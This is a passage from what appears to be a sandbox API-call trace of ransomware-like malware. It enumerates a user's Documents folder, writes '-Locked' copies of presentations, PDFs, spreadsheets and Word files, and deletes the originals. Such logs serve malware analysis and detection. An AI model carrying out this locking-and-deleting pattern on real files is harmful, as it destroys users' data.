lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\yPcZCDl_ldX.pptx-Locked", nBufferLength=0x105, lpBuffer=0x1aec9c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Documents\\yPcZCDl_ldX.pptx-Locked", lpFilePart=0x0) returned 0x37 [0302.420] DeleteFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\yPcZCDl_ldX.pptx-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\ypczcdl_ldx.pptx-locked")) returned 1 [0302.421] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\yPcZCDl_ldX.pptx-Locked-Locked-Locked", nBufferLength=0x105, lpBuffer=0x1aeb1c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Documents\\yPcZCDl_ldX.pptx-Locked-Locked-Locked", lpFilePart=0x0) returned 0x45 [0302.421] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af010) returned 1 [0302.421] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\yPcZCDl_ldX.pptx-Locked-Locked-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\ypczcdl_ldx.pptx-locked-locked-locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x49c [0302.421] GetFileType (hFile=0x49c) returned 0x1 [0302.421] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af00c) returned 1 [0302.421] GetFileType (hFile=0x49c) returned 0x1 [0302.423] CloseHandle (hObject=0x49c) returned 1 [0302.424] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\yPcZCDl_ldX.pptx-Locked-Locked", nBufferLength=0x105, lpBuffer=0x1aec9c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Documents\\yPcZCDl_ldX.pptx-Locked-Locked", lpFilePart=0x0) returned 0x3e [0302.424] DeleteFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\yPcZCDl_ldX.pptx-Locked-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\ypczcdl_ldx.pptx-locked-locked")) returned 1 [0302.425] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\zBhJ.pdf-Locked-Locked", nBufferLength=0x105, lpBuffer=0x1aeb1c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Documents\\zBhJ.pdf-Locked-Locked", lpFilePart=0x0) returned 0x36 [0302.425] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af010) returned 1 [0302.425] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\zBhJ.pdf-Locked-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\zbhj.pdf-locked-locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x49c [0302.425] GetFileType (hFile=0x49c) returned 0x1 [0302.425] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af00c) returned 1 [0302.425] GetFileType (hFile=0x49c) returned 0x1 [0302.427] CloseHandle (hObject=0x49c) returned 1 [0302.427] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\zBhJ.pdf-Locked", nBufferLength=0x105, lpBuffer=0x1aec9c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Documents\\zBhJ.pdf-Locked", lpFilePart=0x0) returned 0x2f [0302.427] DeleteFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\zBhJ.pdf-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\zbhj.pdf-locked")) returned 1 [0302.428] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\zBhJ.pdf-Locked-Locked-Locked", nBufferLength=0x105, lpBuffer=0x1aeb1c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Documents\\zBhJ.pdf-Locked-Locked-Locked", lpFilePart=0x0) returned 0x3d [0302.428] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af010) returned 1 [0302.428] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\zBhJ.pdf-Locked-Locked-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\zbhj.pdf-locked-locked-locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x49c [0302.429] GetFileType (hFile=0x49c) returned 0x1 [0302.429] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af00c) returned 1 [0302.429] GetFileType (hFile=0x49c) returned 0x1 [0302.430] CloseHandle (hObject=0x49c) returned 1 [0302.431] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\zBhJ.pdf-Locked-Locked", nBufferLength=0x105, lpBuffer=0x1aec9c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Documents\\zBhJ.pdf-Locked-Locked", lpFilePart=0x0) returned 0x36 [0302.431] DeleteFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\zBhJ.pdf-Locked-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\zbhj.pdf-locked-locked")) returned 1 [0302.431] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\ZFnXJ8 _1nRlfFhG.docx-Locked-Locked", nBufferLength=0x105, lpBuffer=0x1aeb1c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Documents\\ZFnXJ8 _1nRlfFhG.docx-Locked-Locked", lpFilePart=0x0) returned 0x43 [0302.431] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af010) returned 1 [0302.432] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\ZFnXJ8 _1nRlfFhG.docx-Locked-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\zfnxj8 _1nrlffhg.docx-locked-locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x49c [0302.432] GetFileType (hFile=0x49c) returned 0x1 [0302.432] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af00c) returned 1 [0302.432] GetFileType (hFile=0x49c) returned 0x1 [0302.434] CloseHandle (hObject=0x49c) returned 1 [0302.434] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\ZFnXJ8 _1nRlfFhG.docx-Locked", nBufferLength=0x105, lpBuffer=0x1aec9c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Documents\\ZFnXJ8 _1nRlfFhG.docx-Locked", lpFilePart=0x0) returned 0x3c [0302.434] DeleteFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\ZFnXJ8 _1nRlfFhG.docx-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\zfnxj8 _1nrlffhg.docx-locked")) returned 1 [0302.463] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\ZFnXJ8 _1nRlfFhG.docx-Locked-Locked-Locked", nBufferLength=0x105, lpBuffer=0x1aeb1c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Documents\\ZFnXJ8 _1nRlfFhG.docx-Locked-Locked-Locked", lpFilePart=0x0) returned 0x4a [0302.463] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af010) returned 1 [0302.463] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\ZFnXJ8 _1nRlfFhG.docx-Locked-Locked-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\zfnxj8 _1nrlffhg.docx-locked-locked-locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x49c [0302.464] GetFileType (hFile=0x49c) returned 0x1 [0302.464] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af00c) returned 1 [0302.464] GetFileType (hFile=0x49c) returned 0x1 [0302.466] CloseHandle (hObject=0x49c) returned 1 [0302.466] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\ZFnXJ8 _1nRlfFhG.docx-Locked-Locked", nBufferLength=0x105, lpBuffer=0x1aec9c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Documents\\ZFnXJ8 _1nRlfFhG.docx-Locked-Locked", lpFilePart=0x0) returned 0x43 [0302.466] DeleteFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\ZFnXJ8 _1nRlfFhG.docx-Locked-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\zfnxj8 _1nrlffhg.docx-locked-locked")) returned 1 [0302.467] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af11c) returned 1 [0302.467] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\i3bdpGM-nK_y", nBufferLength=0x105, lpBuffer=0x1aec24, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Documents\\i3bdpGM-nK_y", lpFilePart=0x0) returned 0x2c [0302.467] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\i3bdpGM-nK_y\\", nBufferLength=0x105, lpBuffer=0x1aebf8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Documents\\i3bdpGM-nK_y\\", lpFilePart=0x0) returned 0x2d [0302.467] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\i3bdpGM-nK_y\\*", lpFindFileData=0x1aee44 | out: lpFindFileData=0x1aee44*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc9764700, ftCreationTime.dwHighDateTime=0x1d7e0a0, ftLastAccessTime.dwLowDateTime=0x32cd0529, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x339414c2, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x737a28 [0302.467] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee54 | out: lpFindFileData=0x1aee54*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc9764700, ftCreationTime.dwHighDateTime=0x1d7e0a0, ftLastAccessTime.dwLowDateTime=0x32cd0529, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x339414c2, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0302.472] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee54 | out: lpFindFileData=0x1aee54*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x338b762d, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x338b762d, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x338b762d, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="BVt ejKmCvm0R4EXK.ods-Locked-Locked", cAlternateFileName="BVTEJK~1.ODS")) returned 1 [0302.472] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee54 | out: lpFindFileData=0x1aee54*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3391f23c, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x3391f23c, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x3391f23c, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="mIKc8RXt4Q.pptx-Locked-Locked", cAlternateFileName="MIKC8R~1.PPT")) returned 1 [0302.473] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee54 | out: lpFindFileData=0x1aee54*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3392a218, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x3392a218, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x3392a218, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="ppl3T.xlsx-Locked-Locked", cAlternateFileName="PPL3T~1.XLS")) returned 1 [0302.473] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee54 | out: lpFindFileData=0x1aee54*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3393516e, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x3393516e, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x3393516e, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="rRshMO_Ed0_wrhaH.pdf-Locked-Locked", cAlternateFileName="RRSHMO~1.PDF")) returned 1 [0302.473] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee54 | out: lpFindFileData=0x1aee54*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0302.473] FindClose (in: hFindFile=0x737a28 | out: hFindFile=0x737a28) returned 1 [0302.473] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af0dc) returned 1 [0302.473] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af0e8) returned 1 [0302.474] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af11c) returned 1 [0302.474] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\i3bdpGM-nK_y", nBufferLength=0x105, lpBuffer=0x1aec24, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Documents\\i3bdpGM-nK_y", lpFilePart=0x0) returned 0x2c [0302.474] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\i3bdpGM-nK_y\\", nBufferLength=0x105, lpBuffer=0x1aebf8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Documents\\i3bdpGM-nK_y\\", lpFilePart=0x0) returned 0x2d [0302.474] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\i3bdpGM-nK_y\\*", lpFindFileData=0x1aee44 | out: lpFindFileData=0x1aee44*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc9764700, ftCreationTime.dwHighDateTime=0x1d7e0a0, ftLastAccessTime.dwLowDateTime=0x339414c2, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x339414c2, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x737a28 [0302.474] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee54 | out: lpFindFileData=0x1aee54*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc9764700, ftCreationTime.dwHighDateTime=0x1d7e0a0, ftLastAccessTime.dwLowDateTime=0x339414c2, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x339414c2, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0302.476] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee54 | out: lpFindFileData=0x1aee54*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x338b762d, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x338b762d, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x338b762d, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="BVt ejKmCvm0R4EXK.ods-Locked-Locked", cAlternateFileName="BVTEJK~1.ODS")) returned 1 [0302.476] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee54 | out: lpFindFileData=0x1aee54*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3391f23c, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x3391f23c, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x3391f23c, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="mIKc8RXt4Q.pptx-Locked-Locked", cAlternateFileName="MIKC8R~1.PPT")) returned 1 [0302.476] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee54 | out: lpFindFileData=0x1aee54*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3392a218, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x3392a218, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x3392a218, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="ppl3T.xlsx-Locked-Locked", cAlternateFileName="PPL3T~1.XLS")) returned 1 [0302.481] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee54 | out: lpFindFileData=0x1aee54*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3393516e, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x3393516e, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x3393516e, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="rRshMO_Ed0_wrhaH.pdf-Locked-Locked", cAlternateFileName="RRSHMO~1.PDF")) returned 1 [0302.481] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee54 | out: lpFindFileData=0x1aee54*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3393516e, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x3393516e, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x3393516e, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="rRshMO_Ed0_wrhaH.pdf-Locked-Locked", cAlternateFileName="RRSHMO~1.PDF")) returned 0 [0302.482] FindClose (in: hFindFile=0x737a28 | out: hFindFile=0x737a28) returned 1 [0302.482] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af0dc) returned 1 [0302.482] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af0e8) returned 1 [0302.482] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\i3bdpGM-nK_y\\BVt ejKmCvm0R4EXK.ods-Locked-Locked-Locked", nBufferLength=0x105, lpBuffer=0x1aead4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Documents\\i3bdpGM-nK_y\\BVt ejKmCvm0R4EXK.ods-Locked-Locked-Locked", lpFilePart=0x0) returned 0x57 [0302.482] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1aefc8) returned 1 [0302.482] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\i3bdpGM-nK_y\\BVt ejKmCvm0R4EXK.ods-Locked-Locked-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\i3bdpgm-nk_y\\bvt ejkmcvm0r4exk.ods-locked-locked-locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x49c [0302.483] GetFileType (hFile=0x49c) returned 0x1 [0302.483] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1aefc4) returned 1 [0302.483] GetFileType (hFile=0x49c) returned 0x1 [0302.507] CloseHandle (hObject=0x49c) returned 1 [0302.507] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\i3bdpGM-nK_y\\BVt ejKmCvm0R4EXK.ods-Locked-Locked", nBufferLength=0x105, lpBuffer=0x1aec54, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Documents\\i3bdpGM-nK_y\\BVt ejKmCvm0R4EXK.ods-Locked-Locked", lpFilePart=0x0) returned 0x50 [0302.507] DeleteFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\i3bdpGM-nK_y\\BVt ejKmCvm0R4EXK.ods-Locked-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\i3bdpgm-nk_y\\bvt ejkmcvm0r4exk.ods-locked-locked")) returned 1 [0302.508] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\i3bdpGM-nK_y\\mIKc8RXt4Q.pptx-Locked-Locked-Locked", nBufferLength=0x105, lpBuffer=0x1aead4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Documents\\i3bdpGM-nK_y\\mIKc8RXt4Q.pptx-Locked-Locked-Locked", lpFilePart=0x0) returned 0x51 [0302.508] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1aefc8) returned 1 [0302.508] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\i3bdpGM-nK_y\\mIKc8RXt4Q.pptx-Locked-Locked-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\i3bdpgm-nk_y\\mikc8rxt4q.pptx-locked-locked-locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x49c [0302.509] GetFileType (hFile=0x49c) returned 0x1 [0302.509] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1aefc4) returned 1 [0302.509] GetFileType (hFile=0x49c) returned 0x1 [0302.514] CloseHandle (hObject=0x49c) returned 1 [0302.514] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\i3bdpGM-nK_y\\mIKc8RXt4Q.pptx-Locked-Locked", nBufferLength=0x105, lpBuffer=0x1aec54, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Documents\\i3bdpGM-nK_y\\mIKc8RXt4Q.pptx-Locked-Locked", lpFilePart=0x0) returned 0x4a [0302.514] DeleteFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\i3bdpGM-nK_y\\mIKc8RXt4Q.pptx-Locked-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\i3bdpgm-nk_y\\mikc8rxt4q.pptx-locked-locked")) returned 1 [0302.515] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\i3bdpGM-nK_y\\ppl3T.xlsx-Locked-Locked-Locked", nBufferLength=0x105, lpBuffer=0x1aead4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Documents\\i3bdpGM-nK_y\\ppl3T.xlsx-Locked-Locked-Locked", lpFilePart=0x0) returned 0x4c [0302.515] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1aefc8) returned 1 [0302.515] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\i3bdpGM-nK_y\\ppl3T.xlsx-Locked-Locked-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\i3bdpgm-nk_y\\ppl3t.xlsx-locked-locked-locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x49c [0302.517] GetFileType (hFile=0x49c) returned 0x1 [0302.517] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1aefc4) returned 1 [0302.517] GetFileType (hFile=0x49c) returned 0x1 [0302.519] CloseHandle (hObject=0x49c) returned 1 [0302.519] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\i3bdpGM-nK_y\\ppl3T.xlsx-Locked-Locked", nBufferLength=0x105, lpBuffer=0x1aec54, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Documents\\i3bdpGM-nK_y\\ppl3T.xlsx-Locked-Locked", lpFilePart=0x0) returned 0x45 [0302.520] DeleteFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\i3bdpGM-nK_y\\ppl3T.xlsx-Locked-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\i3bdpgm-nk_y\\ppl3t.xlsx-locked-locked")) returned 1 [0302.520] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\i3bdpGM-nK_y\\rRshMO_Ed0_wrhaH.pdf-Locked-Locked-Locked", nBufferLength=0x105, lpBuffer=0x1aead4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Documents\\i3bdpGM-nK_y\\rRshMO_Ed0_wrhaH.pdf-Locked-Locked-Locked", lpFilePart=0x0) returned 0x56 [0302.520] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1aefc8) returned 1 [0302.520] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\i3bdpGM-nK_y\\rRshMO_Ed0_wrhaH.pdf-Locked-Locked-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\i3bdpgm-nk_y\\rrshmo_ed0_wrhah.pdf-locked-locked-locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x49c [0302.521] GetFileType (hFile=0x49c) returned 0x1 [0302.521] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1aefc4) returned 1 [0302.521] GetFileType (hFile=0x49c) returned 0x1 [0302.523] CloseHandle (hObject=0x49c) returned 1 [0302.523] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\i3bdpGM-nK_y\\rRshMO_Ed0_wrhaH.pdf-Locked-Locked", nBufferLength=0x105, lpBuffer=0x1aec54, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Documents\\i3bdpGM-nK_y\\rRshMO_Ed0_wrhaH.pdf-Locked-Locked", lpFilePart=0x0) returned 0x4f [0302.523] DeleteFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\i3bdpGM-nK_y\\rRshMO_Ed0_wrhaH.pdf-Locked-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\i3bdpgm-nk_y\\rrshmo_ed0_wrhah.pdf-locked-locked")) returned 1 [0302.524] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\i3bdpGM-nK_y", nBufferLength=0x105, lpBuffer=0x1aeca8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Documents\\i3bdpGM-nK_y", lpFilePart=0x0) returned 0x2c [0302.524] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af0f4) returned 1 [0302.524] GetFileAttributesExW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\i3bdpGM-nK_y" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\i3bdpgm-nk_y"), fInfoLevelId=0x0, lpFileInformation=0x1af174 | out: lpFileInformation=0x1af174*(dwFileAttributes=0x10, 